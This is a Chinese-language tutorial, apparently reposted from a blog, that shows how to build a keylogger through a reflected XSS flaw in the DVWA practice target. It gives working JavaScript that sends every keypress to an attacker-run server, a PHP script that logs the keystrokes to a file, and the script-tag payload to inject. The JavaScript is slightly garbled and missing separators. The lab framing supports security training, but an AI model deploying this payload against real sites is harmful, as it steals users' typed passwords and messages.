利用XSS漏洞實現鍵盤記錄器

本實驗以反射性的XSS漏洞為例
實驗環境：dvwa靶機(ip:192.168.135.140)
kali linux(ip:192.168.135.138)

1.首先開啟在kail上開啟apache服務

/etc/init.d/apache2 start

在firefox地址欄輸入： http://192.168.135.138 或者 http://localhost 檢測apache是否開啟,看見以下即可

2.在/var/www/html創建三個文件
(1)keylogger.js【遠程js腳本文件】

document.onkeypress = function(evt) {evt = evt || window.eventkey = String.fromCharCode(evt.charCode)if (key) {var http = new XMLHttpRequest();var param = encodeURI(key)http.open("POST","http://192.168.135.138/keylogger.php",true);http.setRequestHeader("Content-type","application/x-www-form-urlencoded");http.send("key="+param);} }

(2)keylogger.php 【用于將鍵盤上的敲擊的記錄通過POST傳送到keylog.txt中】

<?php $key = $_POST['key']; $log = fopen("keylog.txt","a"); fwrite($log,$key); fclose($log); ?>

(3)keylog.txt 【空文件用于接收鍵盤的記錄】

2.XSS漏洞測試開始
（1）在瀏覽器訪問dvwa靶機并且登錄

（2）在輸入框中輸入以下代碼

<script src="http://192.168.135.138/keylogger.js"></script>

或者使用hackbar插件

（3）緊接著在這個頁面隨意敲擊鍵盤并查看keylog.txt是否有記錄

看見以上效果及實驗成功。

總結

以上是生活随笔為你收集整理的利用XSS漏洞实现键盘记录器的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。